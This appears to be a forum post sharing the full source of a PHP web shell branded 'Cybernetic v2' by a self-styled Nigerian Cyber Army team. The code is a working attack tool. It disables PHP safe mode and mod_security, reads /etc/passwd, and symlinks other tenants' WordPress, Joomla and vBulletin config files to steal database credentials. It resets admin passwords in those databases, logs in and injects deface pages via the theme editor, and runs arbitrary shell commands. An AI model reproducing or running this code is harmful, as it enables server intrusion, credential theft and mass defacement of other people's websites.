13 Years of Service
24%
NCA Team's Private Shell
Code:
>SecFilterEngine OffSecFilterScanPOST OffSecFilterCheckURLEncoding OffSecFilterCheckUnicodeEncoding Off";file_put_contents("php.ini",$byphp);file_put_contents(".htaccess",$byht);$_SESSION['safechk'] = "done";die("PHP Safe Mode ByPassed. Please Refresh This page");}}function convertByte($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B';}function curPageURL() { $pageURL = 'http'; if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";} $pageURL .= "://"; if ($_SERVER["SERVER_PORT"] != "80") { $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"]; } else { $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]; } return $pageURL;}function chkDis($link,$str){$lol = get_headers($link,1);if(strpos($lol[0],"200")){$nan = file_get_contents($link);if(strpos($nan,$str)){return true;}else{ return false; }}else{ return false; }}function getDnamed(){if(is_readable("/var/named")){$list = scandir("/var/named");foreach($list as $domain){if(strpos($domain,".db")){$i += 1;$domain = str_replace('.db','',$domain);$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));$dn[$owner['name']] = $domain;}}}return $dn;}function chkSys($link){$sys_arr = array("WordPress" => array("l" => "wp-config.php", "s" => "WordPress"), //"WordPress2" => array("l" => "blog/wp-config.php", "s" => "WordPress"), "Joomla" => array("l" => "configuration.php", "s" => "JConfig"), //"Joomla2" => array("l" => "joomla/configuration.php", "s" => "JConfig"), //"vBulletin" => array("l" => "includes/config.php", "s" => "vBulletin"), // "Drupal" => array("l" => "sites/default/settings.php", "s" => "Drupal"), // "SMF" => array("l" => "Settings.php", "s" => "SMF"), //"osCommerce" => array("l" => "Settings.php", "s" => "DIR_WS_FUNCTIONS"), //"vBulletin2" => array("l" => "vb/includes/config.php", "s" => "vBulletin"), //"vBulletin3" => array("l" => "forum/includes/config.php", "s" => "vBulletin"), //"WHMCS" => "clients/configuration.php", // "WHMCS2" => "support/configuration.php", // "WHMCS3" => "client/configuration.php", // "WHMCS4" => "forum/includes/config.php", ); foreach($sys_arr as $k=>$dan){if(chkDis($link.$dan['l'],$dan['s'])){return array('link' => $link.$dan['l'], 'cms' => $k);}}}function EloFind($str,$start,$end){$len = strlen($str);$start_pos = (strpos($str,$start) + strlen($start));$str = substr($str,$start_pos);$end_pos = strpos($str,$end);$str = substr($str,0,$end_pos);return $str; }function GetPage($url,$cookie,$post = null,$head = true) {$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_HEADER, $head); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);If ($post != NULL){curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $post);}$urlPage = curl_exec($ch);if(curl_errno($ch)){echo curl_error($ch);}curl_close($ch);return($urlPage);}function throwErr($str){$arr = array("status" => "error", "msg" => $str);die(json_encode($arr));}function add2file($file,$str){if(file_exists($file)){$do = file_get_contents($file);if(!strpos($do,$str)){file_put_contents($file,$str,FILE_APPEND);}}else{file_put_contents($file,$str,FILE_APPEND);}}function doXploitWP($cnf,$html,$npass){$success = false;//Grabbing db info from symlink$str = file_get_contents($cnf);if(preg_match('%DB_USER%',$str)){$username=EloFind($str,"define('DB_USER', '","');");$password=EloFind($str,"define('DB_PASSWORD', '","');");$dbname=EloFind($str,"define('DB_NAME', '","');");$prefix=EloFind($str,"table_prefix = '","'");//Connecting mysql and updating admin info$link=mysql_connect("localhost",$username,$password) ;if ($link) {mysql_select_db($dbname,$link) ;$req1 =mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.' WHERE `ID` =1 LIMIT 1 ;");$req =mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");$data = mysql_fetch_array($req);$site_url=$data["option_value"];}else{throwErr("Mysql Fail");}//Lets loginto wp now$status['site'] = $site_url;$cookie = 'cookie/'.md5($cnf).'.txt';@unlink($cookie);$logged_in = true;$url = $site_url."/wp-login.php";$postme = 'log=admin&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1';$logme = GetPage($url,$cookie,$postme);if(!preg_match('%logout%',$logme)){file_put_contents("login.txt",$site_url.$logme);throwErr("Login Error");}if($logged_in){//Lets go to theme editor now ;)$url = $site_url."/wp-admin/theme-editor.php";$themeditor = GetPage($url,$cookie,null);//Now sort out index and bla bla php to update $nola = explode(Chr(10),$themeditor);foreach($nola as $nline){if(preg_match('%theme-editor\.php\?file=%',$nline) && preg_match('%\((index\.php|home\.php|404\.php|archive\.php|comment\.php)\)%',strtolower($nline))){$modify[EloFind($nline,'(',')')] = EloFind($nline,'$indfile){$nri = str_replace('.','_',$met);$nri = "n".$nri;if($_POST[$nri] == "on" && (!$success OR $met == "index.php")){$indfile =str_replace("&","&",$indfile);$url = trim($site_url."/wp-admin/".$indfile);$themepage = GetPage($url,$cookie,"");$_wpnonce = EloFind($themepage,'name="_wpnonce" value="','"');$_file = EloFind($themepage,'name="file" value="','"');$nfile = explode('themes',$_file);$jfile = $site_url."/wp-content/themes".end($nfile);//Update file$url = $site_url."/wp-admin/theme-editor.php";$postme = "newcontent=".urlencode($html)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File";$themedied = GetPage($url,$cookie,$postme);if(preg_match('%%',$themedied)){if(!$success){add2file("wp_site.txt",$jfile.Chr(10));}$success = true;if($met == "index.php"){add2file("wp_index.txt",$site_url.Chr(10));}}else{$error = true;}}}}else{throwErr("No file found");}if($success){$url = trim($site_url."/wp-admin/profile.php");$themepage = GetPage($url,$cookie,"");$_wpnonce = EloFind($themepage,'name="_wpnonce" value="','"');$url = trim($site_url."/wp-admin/profile.php");$postme = "_wpnonce=".$_wpnonce."&_wp_http_referer=%2Fwp-admin%2Fprofile.php%3Fupdated%3Dtrue&from=profile&checkuser_id=1&admin_color=fresh&admin_bar_front=1&first_name=&last_name=&nickname=admin&display_name=BangladeshCyberArmy&[email protected]&url=&aim=&yim=&jabber=&description=&pass1=".$npass."&pass2=".$npass."&action=update&user_id=1&submit=Update+Profile";$themepage = GetPage($url,$cookie,$postme);$status['status'] = "success";die(json_encode($status));}else{if($error){throwErr("Could't Update the file");}else{throwErr("Selected file not found");}}}}else{throwErr("Config not found");}return true;}function doXploitJM($cnf,$html,$npass){//Grabbing db info from symlinkfunction joomlaCom($site_url,$cookie,$site){if($_POST['com_install'] == "on"){$url = $site_url . "/index.php?option=com_installer";$compage = GetPage($url,$cookie);preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$compage,$dhash);$hash = $dhash[1];preg_match_all('#value="/(.*?)"#s',$compage,$path);foreach($path[0] as $pathx){$pathx=ereg_replace('value="','',$pathx);$pathx=ereg_replace('"','',$pathx);}$dir = getcwd()."/bca.html";$postme = array("install_package"=>"@".$dir ,"install_directory"=>"".$pathx."","install_url"=>"http://","type"=>"","installtype"=>"upload","task"=>"doInstall","option"=>"com_installer","".$hash.""=>"1");$url = $site_url . "/index.php?option=com_installer";$com_shell = GetPage($url,$cookie,$postme);if(preg_match('#Unknown Archive Type#s',$com_shell)){add2file("jm_site.txt",$site."/tmp/pca.html".Chr(10));$status['site'] = $site."/tmp/pca.html";$status['status'] = "success";die(json_encode($status));}else{return false;}}return true;}$str = file_get_contents($cnf);if(preg_match('%(JConfig|mosConfig)%',$str)){if(preg_match('%JConfig%', $str)){$username=EloFind($str,"\$user = '","'");$password=EloFind($str,"\$password = '","'");$dbname=EloFind($str,"\$db = '","'");$prefix=EloFind($str,"\$dbprefix = '","'");$pwd = md5($npass);if($_POST['domain'] != "..."){$site_url = $_POST['domain'];$site_url = "http://".$site_url;}else{$mailto = EloFind($str,"\$mailfrom = '","'");$siteul = explode('@',$mailto);$site_url = "http://".$siteul[1];}}elseif(preg_match('%mosConfig%',$str)){$username=EloFind($str,"\$mosConfig_user = '","'");$password=EloFind($str,"\$mosConfig_password = '","'");$dbname=EloFind($str,"\$mosConfig_db = '","'");$prefix=EloFind($str,"\$mosConfig_dbprefix = '","'");$pwd = md5($npass);if($_POST['domain'] != "..."){$site_url = $_POST['domain'];$site_url = "http://".$site_url;}else{$mailto = EloFind($str,"\$mosConfig_mailfrom = '","'");$siteul = explode('@',$mailto);$site_url = "http://".$siteul[1];}}$site = $site_url;$site_url = $site_url."/administrator/";$cookie = 'cookie/'.md5($cnf).'.txt';@unlink($cookie);$link=mysql_connect("localhost",$username,$password) ;if ($link) {mysql_select_db($dbname,$link);$changepass = mysql_query("UPDATE ".$prefix."users SET username ='admin' , block ='0' , password = '".$pwd."'");$doit =mysql_query("SELECT * from `".$prefix."extensions` ");if($doit){//Joomla 1.6if($_POST['ignore_def'] == "on"){$req =mysql_query("SELECT * from `".$prefix."template_styles` WHERE client_id='0' and home='0'");$data = mysql_fetch_array($req);$template_name=$data["template"];if(strlen($template_name) ",$out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $out = ""; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } return $out;}if($_POST['ac'] == "secinfo"){if(is_readable("/etc/named.conf")){echo '» /etc/named.conf is readable.
';}else{echo '» /etc/named.conf not readable
';}if(is_readable("/etc/passwd")){echo '» /etc/passwd is readable.
';}else{echo '» /etc/passwd not readable
';}if(is_readable("/etc/valiases")){echo '» /etc/valiases exists';if(is_array(scandir("/etc/valiases"))){echo ' & scanable';}echo '.
';}else{echo '» /etc/valiases not readable
';}if(is_readable("/var/named")){echo '» /var/named exists';if(is_array(scandir("/var/named"))){echo ' & scanable';}echo '.
';}else{echo '» /var/named not readable
';}if(ini_get('disable_functions')){echo '» '.ini_get('disable_functions').' are disabled
';}if(function_exists("symlink")){echo '» Symlinking allowed
';}else{echo '» Symlinking not allowed
';}if(is_writable("/var/tmp")){echo '» /var/tmp folder is writable
';}if(is_readable('/var/log')){echo '» /var/log folder is readable
';}die();}elseif($_POST['ac'] == "sysinfo"){echo "System: ".php_uname()."
";echo "WebServer: ".$_SERVER['SERVER_SOFTWARE']."
";echo "PHP version: ".phpversion()." on ".php_sapi_name()."
";$ssys = "None";if(is_dir("/usr/local/cpanel")){$ssys = "Running On Cpanel";}elseif(is_dir("/usr/local/directadmin")){$ssys = "Running On Directadmin";}echo "Server System: ".$ssys."
";if(function_exists("disk_total_space")){echo "Free Disk: ".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."
";}echo "Server IP: ".$_SERVER["SERVER_ADDR"]."
";die();}elseif($_POST['ac'] == "browse"){error_reporting(0);if($_POST['path'] != ""){$path = $_POST['path'];}else{$path = getcwd();}$filez = scandir($path);$q = 2;foreach($filez as $mfile){if($q == 2){$q = 1;}else{$q = 2;}$npath = $_POST['path'].$mfile;$stat = stat($npath);$usr = posix_getpwuid($stat['uid']);$grp = posix_getpwuid($stat['gid']);if(is_dir($npath)){$size = "Dir";}else{$size = convertByte($stat['size']);}$fperm = substr(sprintf('%o', fileperms($npath)), -4);if(!$fperm){$fperm = "Restricted";}elseif(is_writeable($npath)){$fperm = "".$fperm."";}elseif(is_readable($npath)){$fperm = "".$fperm."";}echo ''.$mfile.''.$size.'Modify'.$usr['name']."/".$grp['name'].''.$fperm.'Action';}die();}elseif($_POST['ac'] == "chknamed"){error_reporting(0);if(is_readable("/etc/named.conf")){$named = file_get_contents("/etc/named.conf");preg_match_all('%zone \"(.*)\" {%',$named,$domains);foreach($domains[1] as $domain){$domain = trim($domain);$i += 1;$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));$dn .= "".$domain." - ".$owner['name']."
";}echo "Total Domains Found: ".$i."
".$dn;die();}elseif(is_readable("/etc/valiases")){$list = scandir("/etc/valiases");foreach($list as $domain){$i += 1;$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));$dn .= "".$domain." - ".$owner['name']."
";}echo "Total Domains Found: ".$i."
".$dn;die();}elseif(is_readable("/var/named")){$list = scandir("/var/named");foreach($list as $domain){if(strpos($domain,".db")){$i += 1;$domain = str_replace('.db','',$domain);$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));$dn .= "".$domain." - ".$owner['name']."
";}}echo "Total Domains Found: ".$i."
".$dn;die();}else{die("'/etc/named.conf' is not readable. Try scan for public_html. (:");}}elseif($_POST['ac'] == "safebypass"){$byphp = "safe_mode = Offdisable_functions =safe_mode_gid = OFFopen_basedir = OFFallow_url_fopen = On";$byht = "SecFilterEngine OffSecFilterScanPOST OffSecFilterCheckURLEncoding OffSecFilterCheckUnicodeEncoding Off";file_put_contents("php.ini",$byphp);file_put_contents(".htaccess",$byht);echo "alert('Safe Mode ByPassed'); hideAll();";die();}elseif($_POST['ac'] == "chkph"){if(is_readable("/etc/passwd")){if(!is_dir("bca")){@mkdir('bca',0777);}$htaccss = "Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any";file_put_contents("bca/.htaccess",$htaccss);$etc = file_get_contents("/etc/passwd");$etcz = explode("\n",$etc);foreach($etcz as $etz){$etcc = explode(":",$etz);error_reporting(0);if($enable_wp){symlink('/home/'.$etcc[0].'/public_html/wp-config.php',"nca/".$etcc[0].'-WordPress.txt');symlink('/home/'.$etcc[0].'/public_html/blog/wp-config.php',"nca/".$etcc[0].'-WordPress.txt');symlink('/home/'.$etcc[0].'/public_html/wp/wp-config.php',"nca/".$etcc[0].'-WordPress.txt');}if($enable_phpbb){symlink('/home/'.$etcc[0].'/public_html/config.php',"nca/".$etcc[0].'-PhpBB.txt');}if($enable_vb){symlink('/home/'.$etcc[0].'/public_html/includes/config.php',"nca/".$etcc[0].'-vBulletin.txt');}if($enable_joomla){symlink('/home/'.$etcc[0].'/public_html/configuration.php',"nca/".$etcc[0].'-Joomla.txt');symlink('/home/'.$etcc[0].'/public_html/web/configuration.php',"nca/".$etcc[0].'-Joomla.txt');symlink('/home/'.$etcc[0].'/public_html/site/configuration.php',"nca/".$etcc[0].'-Joomla.txt');}/**symlink('/home/'.$etcc[0].'/public_html/conf_global.php',"nca/".$etcc[0].'-IPB.txt');symlink('/home/'.$etcc[0].'/public_html/inc/config.php',"nca/".$etcc[0].'-MyBB.txt');symlink('/home/'.$etcc[0].'/public_html/Settings.php',"nca/".$etcc[0].'-SMF.txt');symlink('/home/'.$etcc[0].'/public_html/sites/default/settings.php',"bca/".$etcc[0].'-Drupal.txt');symlink('/home/'.$etcc[0].'/public_html/e107_config.php',"nca/".$etcc[0].'-e107.txt');symlink('/home/'.$etcc[0].'/public_html/datas/config.php',"nca/".$etcc[0].'-Seditio.txt');symlink('/home/'.$etcc[0].'/public_html/includes/configure.php',"nca/".$etcc[0].'-osCommerce.txt'); **/}$lol = explode("/",curPageURL());$link = str_replace(end($lol),"",curPageURL());$str = file_get_contents($link."/nca");preg_match_all('%\w \w{4}=(\"|\')(.*)\.txt(\"|\')%',$str,$exp);if(is_array($exp[2])){$q = 2;$dmn = getDnamed();foreach($exp[2] as $sitez){if($q == 2){$q = 1;}else{$q = 2;}$j += 1;$sn = explode("-",$sitez);$domain = $dmn[$sn[0]];if($domain){$domain = "".$domain."";}else{$domain = "...";}$nan .= ''.$sn[0].''.$domain.''.ucfirst($sn[1]).'Idle...';}$cnt = '';echo $nan.$cnt;//echo "Total Sites Found: ".$j."
".$nan;}}die();}elseif($_POST['ac'] == "chkph2"){if(is_readable("/etc/passwd")){if(!is_dir("bca")){@mkdir('bca',0777);}if(!is_link("bca/root")){$sym = symlink("/","bca/root");if(!$sym){die("Symlink method failed.");}}$htaccss = "Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any";file_put_contents("bca/.htaccess",$htaccss);$etc = file_get_contents("/etc/passwd");$etcz = explode("\n",$etc);$lol = explode("/",curPageURL());$link = str_replace(end($lol),"",curPageURL());@unlink("rootinject.tmp");$q = 2;$dmn = getDnamed();foreach($etcz as $etz){$etcc = explode(":",$etz);$dr = "bca/root/home/".$etcc[0]."/public_html/";$dan = chkSys($link.$dr);if($dan){if($q == 2){$q = 1;}else{$q = 2;}$domain = $dmn[$etcc[0]];if($domain){$domain = "".$domain."";}else{$domain = "...";}$k += 1;$nant = ''.$etcc[0].''.$domain.''.$dan['cms'].'Idle...';file_put_contents("rootinject.tmp",$nant,FILE_APPEND);$nan .= $nant;}}$cnt = '';echo $nan.$cnt;//file_put_contents("tmpupdts.log","done");}die();}elseif($_POST['ac'] == "inject"){error_reporting(0);$cms = strtolower($_POST['cms']);$cnf = $_POST['conf'];if(file_exists(md5($_POST['deface_page']))){$html = file_get_contents(md5($_POST['deface_page']));}else{$html = file_get_contents($_POST['deface_page']);file_put_contents(md5($_POST['deface_page']),$html);file_put_contents("pca.html",$html);}if(!is_dir("cookie")){@mkdir("cookie",0777);}switch($cms){case "wordpress":doXploitWP($cnf,$html,"uradhura123");break;case "joomla":doXploitJM($cnf,$html,"uradhura123");break;case "vbulletin":doXploitVB($cnf,$html);break;case "phpbb":break;case "ipb":break;case "mybb":break;case "oscommerce":break;case "smf":break;case "drupal":break;case "seditio":break;case "e107":break;}throwErr("Not Added");}elseif($_POST['ac'] == "ssh"){$ssh = exme($_POST['command']);die(nl2br($ssh));}elseif($_POST['ac'] == "phpinfo"){$php = phpinfo();die($php);}?>Cybernetic v2 By [Nigerian Cyber Army]body{font-family: "courier new";background-color: black;font-size:80%;color: #28FE14;background-image: url("data:image/gif;base64,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");}#sysinfo{border: 1px solid #28FE14;position:fixed;padding:2px;top:1px;left:1px;background-color: black;font-size:12px;}#phpinfo{border: 1px solid #28FE14;position:fixed;padding:2px;top:1px;right:1px;background-color: black;font-size:12px;}#status{border: 1px solid #28FE14;position:fixed;padding:2px;bottom:1px;right:1px;background-color: black;font-size:12px;}#infobox{z-index:1;border: 1px solid white;margin-left:auto;margin-right:auto;margin-top:50px;width:600px;background-color: black;font-size:12px;}.infotitle{padding:4px;background-color: white;color: black;font-family: Thaoma;font-size:14px;}.infotxt{padding:5px;}.sidebar{position:fixed;left:1px;top:30%;}.stitle{float:left;cursor:pointer;padding:7px;color:black;background-color: white;}.stitle:hover{color:red;}.smnu{display:none;background-color: black;padding:5px;border: 1px solid white;float:left;}a{color: #df5;text-decoration: none;}a:hover{color:white;}.copyright{position:fixed;bottom:1px;left:1px;padding:2px;}.logo{margin:auto;width:500px;height:550px;background-image: url("http://www3.picturepush.com/photo/a/12062046/img/Anonymous/jkjjjkjkjhjjkjhhhhhhhhhhhhhhhhhhh.jpg");}.filetable{margin-top:2px;width:740px;}.tblcnt{text-align: center;margin-left:2px;color:black;background-color: white;padding:3px;float:left;border: 1px solid white;}.tblbx1{height:12px;text-align: center;margin-left:2px;color:white;background-color: #333333;padding:3px;float:left;border: 1px solid #333333;}.tblbx2{height:12px;text-align: center;margin-left:2px;color:white;background-color: #444444;padding:3px;float:left;border: 1px solid #444444;}.tbl{margin-top:100px;padding-top:2px;padding-bottom: 2px;margin:auto;width:742px;border: 1px solid white;}.rbox{float:left;border: 1px solid #28FE14;padding:10px;}.smit{background-color: black;color: #28FE14;}.sshbox{display:none;padding-left:7px;width:600px;height:400px;margin: auto;margin-top:80px;-webkit-border-radius: 10px;-moz-border-radius: 10px;border-radius: 10px;border:3px solid #FFF5F5;background-color:#080500;overflow:auto;}#sshcmd{width:450px;background-color: #080500;color:#28FE14;border:none;}OS: Safe Mode On";}else{ echo " Safe Mode Off";}?>NameSizeModifyOwnerPermissionActionUserSitenameCMSStatus[-] Informationvar sidebar = false;var sidebar2 = false;function sidebarz(){$('#logo').hide();if(sidebar){$('#smnu').hide();sidebar = false;}else{$('#smnu').show();sidebar = true;}}function sidebarz2(){if(sidebar2){$('#smnu2').hide();sidebar2 = false;}else{$('#smnu2').show();sidebar2 = true;}}function filebrs(val){hideAll();$('#status').html('Status: Requesting...');$.post("", { ac: "browse", path: val},function(data) {$('#tbl').show();$('#status').html('Status: Completed (:'); $('#filest').html(data);});}function doUpdt(val){ var refreshId = setInterval(function() { $("#injtbl").load('rootinject.tmp'); }, 5000); $.ajaxSetup({ cache: false });hideAll();$('#inject').show();$('#status').html('Status: Requesting...');$.post("", { ac: val},function(data) {refreshId = "";$('#sidebar2').show();$('#status').html('Status: Completed (:'); $('#injtbl').html(data);});}function hideAll(){k1 = 0;k2 = 0;$('#sidebar2').hide();$('#tbl').hide();$('#inject').hide();$('#infobox').hide();$('#sshbox').hide();}function doReq(val){hideAll();$('#inject').show();$('#status').html('Status: Requesting...');$.post("", { ac: val},function(data) {$('#sidebar2').show();$('#status').html('Status: Completed (:'); $('#injtbl').html(data);});}function doReq2(val){hideAll();$('#status').html('Status: Requesting...');$.post("", { ac: val},function(data) {$('#infobox').show();$('#status').html('Status: Completed (:'); $('#infotxt').html(data);});}//Js Multi thread post request by Elo (:var k1 = 1; var k2 = 0; var req_limit = 9;function doInject(){var i = 0; var j = 0;$('.conf').each(function(){i += 1;var id = $(this).attr('title');if(id > k1){ j += 1; k1 += 1;var link = $(this).attr('href');var domain = $('#inj_dom' + id).html();var cms = $(this).html();doPost2(link,cms,id,domain);}if(j > req_limit){return false;}});}function doPost2(link,cmz,id,dmn){if($('#injchk'+id).is(':checked')){$('#inj_status' + id).html('Injecting...');$.ajax({ url: "", type: "POST", timeout: 60000, data: {ac: "inject", conf: link, domain: dmn, cms: cmz, ignore_def: $('#ignore_def:checked').val(), n404_php: $('#404_php:checked').val(), nindex_php: $('#index_php:checked').val(), nhome_php: $('#home_php:checked').val(), narchive_php: $('#archive_php:checked').val(), ncomment_php: $('#comment_php:checked').val(), com_install: $('#use_com:checked').val(), deface_page: $('#deface_page').val()}, dataType: "text"}).done(function(msg) {k2 += 1;$('#inj_status' + id).html('Parse Error');$('#inj_status' + id).css({"background-color" : "red", "color" : "white"});var res_data = JSON.parse(msg);if(res_data.status == "success"){$('#inj_domain' + id).html('<a class="injwork" href="' + res_data.site + '">' + res_data.site + '');$('#inj_status' + id).css({"background-color" : "green", "color" : "white"});$('#inj_status' + id).html('Success');$('#injst' + id).removeClass("conf");}else{if(res_data.status == "error"){$('#inj_status' + id).css({"background-color" : "red", "color" : "white"});$('#inj_status' + id).html(res_data.msg);$('#inj_status' + id).addClass("injerror");$('#injst' + id).removeClass("conf");}else{$('#inj_status' + id).addClass("injerror");$('#inj_status' + id).html('Unknown');$('#injst' + id).removeClass("conf");}}updateInjSts(k2);if(k1 == k2){doInject();}}).fail(function(jqXHR, textStatus) {k2 += 1;$('#inj_status' + id).css({"background-color" : "black", "color" : "white"});$('#inj_status' + id).html('Timeout');updateInjSts(k2); if(k1 == k2){doInject();} });}else{k2 += 1;updateInjSts(k2);if(k1 == k2){doInject();} }}//Js Multi thread post request by Elo (:function updateInjSts(k){var tc = $('#sitecount').val();if(tc > k){$('#status').html("Status: " + k + "/" + tc + " Injected");}else{$('#status').html("Status: Injection Complete (:");}}function rmvErr(){$('.injerror').each(function(){var nano = $(this).parent();$(nano).remove();});}function rmvSlct(){$('.conf').each(function(){var id = $(this).attr('title');if($('#injchk'+id).is(':checked')){$('#inj' + id).remove();}});}function retryTimeout(){k1 = 1; k2 = 0;doInject();}function doSlct(){$('.conf').each(function(){var id = $(this).attr('title');doToggle(id);});}function doToggle(dd){if($('#injchk'+dd).is(':checked')){$('#injc'+dd).css('background-color','red');$('#injchk'+dd).attr('checked',false);}else{$('#injc'+dd).css('background-color','#76BBEB');$('#injchk'+dd).attr('checked',true);}}function doSSH(){$('#status').html("Status: Requesting...");var cmd = $('#sshcmd').val();$('#sshcmd').val("");$.post("", { ac: "ssh",command: cmd},function(data) {$('#sshoutput').append("[root@BBHH~]# <br />"+data+"<br />");$('#status').html("Status: Done.");});}
[root@bca~]# » Security Vulnerability» System Information» PHP Info» File Browser» Scan Domains» CMS Detector [simple]» CMS Detector [root]» Bypass PHP Safe_Mode» Network Tools» SQL Manager» Command Console» Kill MeEXPLOIT» Start Injecting» Export» Rmv Error» Rmv Selected» Retry timeout» Submit to zone-H» SettingsWordPress
404.php
archive.php
index.php
home.php
comment.php
Joomla
Use Com Installer
Ignore Default Templete
Default
Req/s:
Deface Page Link:
Go BackCONTROLStatus: Idle...Copyright © NIGERIAN Cyber Army
